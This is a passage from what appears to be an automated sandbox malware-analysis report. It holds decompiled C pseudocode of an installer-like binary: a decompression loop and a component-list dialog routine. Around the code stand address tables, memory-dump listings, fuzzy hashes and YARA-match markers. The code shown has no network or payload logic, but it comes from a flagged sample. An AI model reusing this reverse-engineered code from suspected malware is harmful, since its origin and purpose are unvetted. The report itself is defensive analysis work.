                                                                                        									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                        									 *_a36 = _t274;
                                                                                        									_t259 = _v16;
                                                                                        									 *_t297 = _t168;
                                                                                        									if(_t259 == 0) {
                                                                                        										 *_a24 = _t168;
                                                                                        									} else {
                                                                                        										_t276 = _v12;
                                                                                        										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                        										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                        										_a5 = _a28;
                                                                                        										_a4 = _t222;
                                                                                        										_t262 = _t276 >> _t186;
                                                                                        										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                        										 *(_t298 + _t262 * 4) = _a4;
                                                                                        									}
                                                                                        									_t224 = _v24;
                                                                                        									_t186 = _t224;
                                                                                        									_t225 = _t224 + _a28;
                                                                                        									_v24 = _t225;
                                                                                        								} while (_v8 > _t225);
                                                                                        								L45:
                                                                                        								_t284 = _v36;
                                                                                        								_a5 = _v8 - _t186;
                                                                                        								if(_t284 < 0x432190 + _a8 * 4) {
                                                                                        									_t205 =  *_t284;
                                                                                        									if(_t205 >= _a12) {
                                                                                        										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                        										_v36 =  &(_v36[1]);
                                                                                        										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                        										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                        									} else {
                                                                                        										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                        										_t208 =  *_t284;
                                                                                        										_v36 =  &(_t284[1]);
                                                                                        									}
                                                                                        									_a6 = _t208;
                                                                                        								} else {
                                                                                        									_a4 = 0xc0;
                                                                                        								}
                                                                                        								_t286 = 1 << _v8 - _t186;
                                                                                        								_t244 = _v12 >> _t186;
                                                                                        								while(_t244 < _v40) {
                                                                                        									 *(_t168 + _t244 * 4) = _a4;
                                                                                        									_t244 = _t244 + _t286;
                                                                                        								}
                                                                                        								_t287 = _v12;
                                                                                        								_t246 = 1 << _v44;
                                                                                        								while((_t287 & _t246) != 0) {
                                                                                        									_t287 = _t287 ^ _t246;
                                                                                        									_t246 = _t246 >> 1;
                                                                                        								}
                                                                                        								_t288 = _t287 ^ _t246;
                                                                                        								_v20 = 1;
                                                                                        								_v12 = _t288;
                                                                                        								_t251 = _v16;
                                                                                        								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                        									L60:
                                                                                        									if(_v48 != 0) {
                                                                                        										_t282 = _v48;
                                                                                        										_t283 = _t282 - 1;
                                                                                        										_t200 = _a28 + _t186;
                                                                                        										_v48 = _t283;
                                                                                        										_v24 = _t200;
                                                                                        										if(_v8 <= _t200) {
                                                                                        											goto L45;
                                                                                        										}
                                                                                        										goto L31;
                                                                                        									}
                                                                                        									break;
                                                                                        								} else {
                                                                                        									goto L58;
                                                                                        								}
                                                                                        								do {
                                                                                        									L58:
                                                                                        									_t186 = _t186 - _a28;
                                                                                        									_t251 = _t251 - 1;
                                                                                        								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                        								_v16 = _t251;
                                                                                        								goto L60;
                                                                                        							}
                                                                                        							L61:
                                                                                        							_v8 = _v8 + 1;
                                                                                        							_v32 = _v32 + 4;
                                                                                        							_v44 = _v44 + 1;
                                                                                        						} while (_v8 <= _v28);
                                                                                        						goto L62;
                                                                                        					}
                                                                                        					_t277 = 0;
                                                                                        					do {
                                                                                        						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                        						_t277 = _t277 + 4;
                                                                                        						_t235 = _t235 - 1;
                                                                                        						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                        					} while (_t235 != 0);
                                                                                        					goto L21;
                                                                                        				}
                                                                                        				 *_a24 =  *_a24 & 0x00000000;
                                                                                        				 *_a28 =  *_a28 & 0x00000000;
                                                                                        				return 0;
                                                                                        			}











































































                                                                                        0x00407567
                                                                                        0x0040756f
                                                                                        0x00407573
                                                                                        0x00407575
                                                                                        0x00407578
                                                                                        0x0040757a
                                                                                        0x0040757a
                                                                                        0x0040757c
                                                                                        0x00407583
                                                                                        0x00407585
                                                                                        0x00407585
                                                                                        0x0040758b
                                                                                        0x004075a0
                                                                                        0x004075a8
                                                                                        0x004075aa
                                                                                        0x004075ac
                                                                                        0x004075af
                                                                                        0x004075b0
                                                                                        0x004075b0
                                                                                        0x004075b6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004075b8
                                                                                        0x004075bb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004075bb
                                                                                        0x004075bf
                                                                                        0x004075c2
                                                                                        0x004075c4
                                                                                        0x004075c4
                                                                                        0x004075c7
                                                                                        0x004075cd
                                                                                        0x004075ce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004075ce
                                                                                        0x004075d3
                                                                                        0x004075d6
                                                                                        0x004075d8
                                                                                        0x004075d8
                                                                                        0x004075de
                                                                                        0x004075e0
                                                                                        0x004075f1
                                                                                        0x004075e4
                                                                                        0x004075e8
                                                                                        0x0040788d
                                                                                        0x00000000
                                                                                        0x0040788d
                                                                                        0x004075ee
                                                                                        0x004075ef
                                                                                        0x004075ef
                                                                                        0x004075f7
                                                                                        0x004075fa
                                                                                        0x004075fe
                                                                                        0x00407600
                                                                                        0x00407602
                                                                                        0x00407605
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040760d
                                                                                        0x00407613
                                                                                        0x00407615
                                                                                        0x00407617
                                                                                        0x00407618
                                                                                        0x0040762d
                                                                                        0x0040762d
                                                                                        0x00407630
                                                                                        0x00407632
                                                                                        0x00407632
                                                                                        0x00407634
                                                                                        0x00407639
                                                                                        0x0040763b
                                                                                        0x00407642
                                                                                        0x00407644
                                                                                        0x0040764c
                                                                                        0x0040764c
                                                                                        0x0040764e
                                                                                        0x0040764f
                                                                                        0x0040765e
                                                                                        0x00407662
                                                                                        0x00407666
                                                                                        0x00407669
                                                                                        0x0040766c
                                                                                        0x00407671
                                                                                        0x00407674
                                                                                        0x0040767a
                                                                                        0x00407681
                                                                                        0x00407687
                                                                                        0x00407880
                                                                                        0x00407880
                                                                                        0x00407885
                                                                                        0x00407894
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407885
                                                                                        0x00407694
                                                                                        0x00407697
                                                                                        0x0040769a
                                                                                        0x0040769d
                                                                                        0x004076a1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004076ac
                                                                                        0x004076af
                                                                                        0x004076b0
                                                                                        0x004076b2
                                                                                        0x004076b8
                                                                                        0x004076bb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004076c1
                                                                                        0x004076c2
                                                                                        0x004076c5
                                                                                        0x004076c8
                                                                                        0x004076cb
                                                                                        0x004076d1
                                                                                        0x004076d3
                                                                                        0x004076d3
                                                                                        0x004076db
                                                                                        0x004076df
                                                                                        0x004076e4
                                                                                        0x00407709
                                                                                        0x0040770f
                                                                                        0x00407711
                                                                                        0x00407713
                                                                                        0x00407716
                                                                                        0x0040771f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004076e6
                                                                                        0x004076e6
                                                                                        0x004076ef
                                                                                        0x004076f3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407704
                                                                                        0x00407704
                                                                                        0x00407707
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004076f7
                                                                                        0x004076fa
                                                                                        0x004076fc
                                                                                        0x00407700
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407702
                                                                                        0x00407702
                                                                                        0x00000000
                                                                                        0x00407704
                                                                                        0x00407728
                                                                                        0x0040772e
                                                                                        0x00407738
                                                                                        0x0040773a
                                                                                        0x0040773f
                                                                                        0x00407741
                                                                                        0x00407777
                                                                                        0x00407743
                                                                                        0x00407743
                                                                                        0x00407746
                                                                                        0x00407749
                                                                                        0x00407753
                                                                                        0x00407756
                                                                                        0x0040775d
                                                                                        0x00407768
                                                                                        0x0040776f
                                                                                        0x0040776f
                                                                                        0x00407779
                                                                                        0x0040777c
                                                                                        0x0040777e
                                                                                        0x00407784
                                                                                        0x00407784
                                                                                        0x0040778d
                                                                                        0x00407790
                                                                                        0x00407795
                                                                                        0x004077a4
                                                                                        0x004077ac
                                                                                        0x004077b1
                                                                                        0x004077d5
                                                                                        0x004077dd
                                                                                        0x004077e1
                                                                                        0x004077e7
                                                                                        0x004077b3
                                                                                        0x004077c1
                                                                                        0x004077c4
                                                                                        0x004077ca
                                                                                        0x004077ca
                                                                                        0x004077eb
                                                                                        0x004077a6
                                                                                        0x004077a6
                                                                                        0x004077a6
                                                                                        0x004077fc
                                                                                        0x00407800
                                                                                        0x0040780c
                                                                                        0x00407807
                                                                                        0x0040780a
                                                                                        0x0040780a
                                                                                        0x00407814
                                                                                        0x00407819
                                                                                        0x00407821
                                                                                        0x0040781d
                                                                                        0x0040781f
                                                                                        0x0040781f
                                                                                        0x00407827
                                                                                        0x00407829
                                                                                        0x00407830
                                                                                        0x0040783a
                                                                                        0x00407844
                                                                                        0x00407860
                                                                                        0x00407864
                                                                                        0x004076a9
                                                                                        0x004076af
                                                                                        0x004076b0
                                                                                        0x004076b2
                                                                                        0x004076b8
                                                                                        0x004076bb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004076bb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407846
                                                                                        0x00407846
                                                                                        0x00407846
                                                                                        0x0040784b
                                                                                        0x00407854
                                                                                        0x0040785d
                                                                                        0x00000000
                                                                                        0x0040785d
                                                                                        0x0040786a
                                                                                        0x0040786a
                                                                                        0x0040786d
                                                                                        0x00407874
                                                                                        0x00407877
                                                                                        0x00000000
                                                                                        0x0040769a
                                                                                        0x0040761a
                                                                                        0x0040761c
                                                                                        0x0040761c
                                                                                        0x00407620
                                                                                        0x00407623
                                                                                        0x00407624
                                                                                        0x00407624
                                                                                        0x00000000
                                                                                        0x0040761c
                                                                                        0x00407590
                                                                                        0x00407596
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                        • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                        • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                        • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                        • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                                                                                        • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: db350ebcedbff3c6632d57d12b934a29040b2c60718b2231553f57e974c762b3
                                                                                        • Instruction ID: 302f7acb11eafeeff3b2e9c5b027f1bb59d8adc787376e6a3d4ff9b2e7392fa1
                                                                                        • Opcode Fuzzy Hash: db350ebcedbff3c6632d57d12b934a29040b2c60718b2231553f57e974c762b3
                                                                                        • Instruction Fuzzy Hash: A8B002756556418FCA55DA19D190F4073B4F7587A0B455490E855C7B51C264E900C910
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 96%
                                                                                        			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                        				struct HWND__* _v8;
                                                                                        				struct HWND__* _v12;
                                                                                        				long _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				signed char* _v32;
                                                                                        				int _v36;
                                                                                        				signed int _v44;
                                                                                        				int _v48;
                                                                                        				signed int* _v60;
                                                                                        				signed char* _v64;
                                                                                        				signed int _v68;
                                                                                        				long _v72;
                                                                                        				void* _v76;
                                                                                        				intOrPtr _v80;
                                                                                        				intOrPtr _v84;
                                                                                        				void* _v88;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t198;
                                                                                        				intOrPtr _t201;
                                                                                        				intOrPtr _t202;
                                                                                        				long _t207;
                                                                                        				signed int _t211;
                                                                                        				signed int _t222;
                                                                                        				void* _t225;
                                                                                        				void* _t226;
                                                                                        				int _t232;
                                                                                        				long _t237;
                                                                                        				long _t238;
                                                                                        				signed int _t239;
                                                                                        				signed int _t245;
                                                                                        				signed int _t247;
                                                                                        				signed char _t248;
                                                                                        				signed char _t254;
                                                                                        				void* _t258;
                                                                                        				void* _t260;
                                                                                        				signed char* _t278;
                                                                                        				signed char _t279;
                                                                                        				long _t284;
                                                                                        				struct HWND__* _t291;
                                                                                        				signed int* _t292;
                                                                                        				int _t293;
                                                                                        				long _t294;
                                                                                        				signed int _t295;
                                                                                        				void* _t297;
                                                                                        				long _t298;
                                                                                        				int _t299;
                                                                                        				signed int _t300;
                                                                                        				signed int _t303;
                                                                                        				signed int _t311;
                                                                                        				signed char* _t319;
                                                                                        				int _t324;
                                                                                        				void* _t326;
                                                                                        
                                                                                        				_t291 = _a4;
                                                                                        				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                        				_v8 = GetDlgItem(_t291, 0x408);
                                                                                        				_t326 = SendMessageW;
                                                                                        				_v24 =  *0x434f28;
                                                                                        				_v28 =  *0x434f10 + 0x94;
                                                                                        				if(_a8 != 0x110) {
                                                                                        					L23:
                                                                                        					if(_a8 != 0x405) {
                                                                                        						_t301 = _a16;
                                                                                        					} else {
                                                                                        						_a12 = 0;
                                                                                        						_t301 = 1;
                                                                                        						_a8 = 0x40f;
                                                                                        						_a16 = 1;
                                                                                        					}
                                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                        						_v16 = _t301;
                                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                        							if(( *0x434f19 & 0x00000002) != 0) {
                                                                                        								L41:
                                                                                        								if(_v16 != 0) {
                                                                                        									_t237 = _v16;
                                                                                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                        									}
                                                                                        									_t238 = _v16;
                                                                                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                        										_t301 = _v24;
                                                                                        										_t239 =  *(_t238 + 0x5c);
                                                                                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                        										} else {
                                                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								goto L48;
                                                                                        							}
                                                                                        							if(_a8 == 0x413) {
                                                                                        								L33:
                                                                                        								_t301 = 0 | _a8 != 0x00000413;
                                                                                        								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                                                        								_t295 = _t245;
                                                                                        								if(_t295 >= 0) {
                                                                                        									_t94 = _v24 + 8; // 0x8
                                                                                        									_t301 = _t245 * 0x818 + _t94;
                                                                                        									_t247 =  *_t301;
                                                                                        									if((_t247 & 0x00000010) == 0) {
                                                                                        										if((_t247 & 0x00000040) == 0) {
                                                                                        											_t248 = _t247 ^ 0x00000001;
                                                                                        										} else {
                                                                                        											_t254 = _t247 ^ 0x00000080;
                                                                                        											if(_t254 >= 0) {
                                                                                        												_t248 = _t254 & 0x000000fe;
                                                                                        											} else {
                                                                                        												_t248 = _t254 | 0x00000001;
                                                                                        											}
                                                                                        										}
                                                                                        										 *_t301 = _t248;
                                                                                        										E0040117D(_t295);
                                                                                        										_a12 = _t295 + 1;
                                                                                        										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                                                        										_a8 = 0x40f;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							_t301 = _a16;
                                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							goto L33;
                                                                                        						} else {
                                                                                        							goto L48;
                                                                                        						}
                                                                                        					} else {
                                                                                        						L48:
                                                                                        						if(_a8 != 0x111) {
                                                                                        							L56:
                                                                                        							if(_a8 == 0x200) {
                                                                                        								SendMessageW(_v8, 0x200, 0, 0);
                                                                                        							}
                                                                                        							if(_a8 == 0x40b) {
                                                                                        								_t225 =  *0x42d24c;
                                                                                        								if(_t225 != 0) {
                                                                                        									ImageList_Destroy(_t225);
                                                                                        								}
                                                                                        								_t226 =  *0x42d260;
                                                                                        								if(_t226 != 0) {
                                                                                        									GlobalFree(_t226);
                                                                                        								}
                                                                                        								 *0x42d24c = 0;
                                                                                        								 *0x42d260 = 0;
                                                                                        								 *0x434f60 = 0;
                                                                                        							}
                                                                                        							if(_a8 != 0x40f) {
                                                                                        								L90:
                                                                                        								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                                                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                        									ShowWindow(_v8, _t324);
                                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                        								}
                                                                                        								goto L93;
                                                                                        							} else {
                                                                                        								E004011EF(_t301, 0, 0);
                                                                                        								_t198 = _a12;
                                                                                        								if(_t198 != 0) {
                                                                                        									if(_t198 != 0xffffffff) {
                                                                                        										_t198 = _t198 - 1;
                                                                                        									}
                                                                                        									_push(_t198);
                                                                                        									_push(8);
                                                                                        									E00404ED4();
                                                                                        								}
                                                                                        								if(_a16 == 0) {
                                                                                        									L75:
                                                                                        									E004011EF(_t301, 0, 0);
                                                                                        									_v36 =  *0x42d260;
                                                                                        									_t201 =  *0x434f28;
                                                                                        									_v64 = 0xf030;
                                                                                        									_v24 = 0;
                                                                                        									if( *0x434f2c <= 0) {
                                                                                        										L86:
                                                                                        										if( *0x434fbe == 0x400) {
                                                                                        											InvalidateRect(_v8, 0, 1);
                                                                                        										}
                                                                                        										_t202 =  *0x433edc; // 0x51f5e2
                                                                                        										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
                                                                                        											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                                                        										}
                                                                                        										goto L90;
                                                                                        									}
                                                                                        									_t292 = _t201 + 8;
                                                                                        									do {
                                                                                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                        										if(_t207 != 0) {
                                                                                        											_t303 =  *_t292;
                                                                                        											_v72 = _t207;
                                                                                        											_v76 = 8;
                                                                                        											if((_t303 & 0x00000001) != 0) {
                                                                                        												_v76 = 9;
                                                                                        												_v60 =  &(_t292[4]);
                                                                                        												_t292[0] = _t292[0] & 0x000000fe;
                                                                                        											}
                                                                                        											if((_t303 & 0x00000040) == 0) {
                                                                                        												_t211 = (_t303 & 0x00000001) + 1;
                                                                                        												if((_t303 & 0x00000010) != 0) {
                                                                                        													_t211 = _t211 + 3;
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t211 = 3;
                                                                                        											}
                                                                                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                        										}
                                                                                        										_v24 = _v24 + 1;
                                                                                        										_t292 =  &(_t292[0x206]);
                                                                                        									} while (_v24 <  *0x434f2c);
                                                                                        									goto L86;
                                                                                        								} else {
                                                                                        									_t293 = E004012E2( *0x42d260);
                                                                                        									E00401299(_t293);
                                                                                        									_t222 = 0;
                                                                                        									_t301 = 0;
                                                                                        									if(_t293 <= 0) {
                                                                                        										L74:
                                                                                        										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                        										_a16 = _t293;
                                                                                        										_a8 = 0x420;
                                                                                        										goto L75;
                                                                                        									} else {
                                                                                        										goto L71;
                                                                                        									}
                                                                                        									do {
                                                                                        										L71:
                                                                                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                        											_t301 = _t301 + 1;
                                                                                        										}
                                                                                        										_t222 = _t222 + 1;
                                                                                        									} while (_t222 < _t293);
                                                                                        									goto L74;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                        							goto L93;
                                                                                        						} else {
                                                                                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                        							if(_t232 == 0xffffffff) {
                                                                                        								goto L93;
                                                                                        							}
                                                                                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                        								_t294 = 0x20;
                                                                                        							}
                                                                                        							E00401299(_t294);
                                                                                        							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                        							_a12 = _a12 | 0xffffffff;
                                                                                        							_a16 = 0;
                                                                                        							_a8 = 0x40f;
                                                                                        							goto L56;
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					_v36 = 0;
                                                                                        					_v20 = 2;
                                                                                        					 *0x434f60 = _t291;
                                                                                        					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                                        					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                                        					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                                        					_t297 = _t258;
                                                                                        					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                                                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                        					 *0x42d24c = _t260;
                                                                                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                        					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                                                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                        					}
                                                                                        					DeleteObject(_t297);
                                                                                        					_t298 = 0;
                                                                                        					do {
                                                                                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                        							if(_t298 != 0x20) {
                                                                                        								_v20 = 0;
                                                                                        							}
                                                                                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                        						}
                                                                                        						_t298 = _t298 + 1;
                                                                                        					} while (_t298 < 0x21);
                                                                                        					_t299 = _a16;
                                                                                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                        					_push(0x15);
                                                                                        					E00404499(_a4);
                                                                                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                        					_push(0x16);
                                                                                        					E00404499(_a4);
                                                                                        					_t300 = 0;
                                                                                        					_v16 = 0;
                                                                                        					if( *0x434f2c <= 0) {
                                                                                        						L19:
                                                                                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                        						goto L20;
                                                                                        					} else {
                                                                                        						_t319 = _v24 + 8;
                                                                                        						_v32 = _t319;
                                                                                        						do {
                                                                                        							_t278 =  &(_t319[0x10]);
                                                                                        							if( *_t278 != 0) {
                                                                                        								_v64 = _t278;
                                                                                        								_t279 =  *_t319;
                                                                                        								_v88 = _v16;
                                                                                        								_t311 = 0x20;
                                                                                        								_v84 = 0xffff0002;
                                                                                        								_v80 = 0xd;
                                                                                        								_v68 = _t311;
                                                                                        								_v44 = _t300;
                                                                                        								_v72 = _t279 & _t311;
                                                                                        								if((_t279 & 0x00000002) == 0) {
                                                                                        									if((_t279 & 0x00000004) == 0) {
                                                                                        										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                        									} else {
                                                                                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                        									}
                                                                                        								} else {
                                                                                        									_v80 = 0x4d;
                                                                                        									_v48 = 1;
                                                                                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                        									_v36 = 1;
                                                                                        									 *( *0x42d260 + _t300 * 4) = _t284;
                                                                                        									_v16 =  *( *0x42d260 + _t300 * 4);
                                                                                        								}
                                                                                        							}
                                                                                        							_t300 = _t300 + 1;
                                                                                        							_t319 =  &(_v32[0x818]);
                                                                                        							_v32 = _t319;
                                                                                        						} while (_t300 <  *0x434f2c);
                                                                                        						if(_v36 != 0) {
                                                                                        							L20:
                                                                                        							if(_v20 != 0) {
                                                                                        								E004044CE(_v8);
                                                                                        								goto L23;
                                                                                        							} else {
                                                                                        								ShowWindow(_v12, 5);
                                                                                        								E004044CE(_v12);
                                                                                        								L93:
                                                                                        								return E00404500(_a8, _a12, _a16);
                                                                                        							}
                                                                                        						}
                                                                                        						goto L19;
                                                                                        					}
                                                                                        				}
                                                                                        			}



























































                                                                                        0x00404f0d
                                                                                        0x00404f26
                                                                                        0x00404f2b
                                                                                        0x00404f33
                                                                                        0x00404f39
                                                                                        0x00404f4f
                                                                                        0x00404f52
                                                                                        0x0040517d
                                                                                        0x00405184
                                                                                        0x00405198
                                                                                        0x00405186
                                                                                        0x00405188
                                                                                        0x0040518b
                                                                                        0x0040518c
                                                                                        0x00405193
                                                                                        0x00405193
                                                                                        0x004051a4
                                                                                        0x004051b2
                                                                                        0x004051b5
                                                                                        0x004051cb
                                                                                        0x00405240
                                                                                        0x00405243
                                                                                        0x00405245
                                                                                        0x0040524f
                                                                                        0x0040525d
                                                                                        0x0040525d
                                                                                        0x0040525f
                                                                                        0x00405269
                                                                                        0x0040526f
                                                                                        0x00405272
                                                                                        0x00405275
                                                                                        0x00405290
                                                                                        0x00405277
                                                                                        0x00405281
                                                                                        0x00405281
                                                                                        0x00405275
                                                                                        0x00405269
                                                                                        0x00000000
                                                                                        0x00405243
                                                                                        0x004051d0
                                                                                        0x004051db
                                                                                        0x004051e0
                                                                                        0x004051e7
                                                                                        0x004051ec
                                                                                        0x004051f0
                                                                                        0x004051fb
                                                                                        0x004051fb
                                                                                        0x004051ff
                                                                                        0x00405203
                                                                                        0x00405207
                                                                                        0x0040521a
                                                                                        0x00405209
                                                                                        0x00405209
                                                                                        0x00405210
                                                                                        0x00405216
                                                                                        0x00405212
                                                                                        0x00405212
                                                                                        0x00405212
                                                                                        0x00405210
                                                                                        0x0040521e
                                                                                        0x00405220
                                                                                        0x00405233
                                                                                        0x00405236
                                                                                        0x00405239
                                                                                        0x00405239
                                                                                        0x00405203
                                                                                        0x00000000
                                                                                        0x004051f0
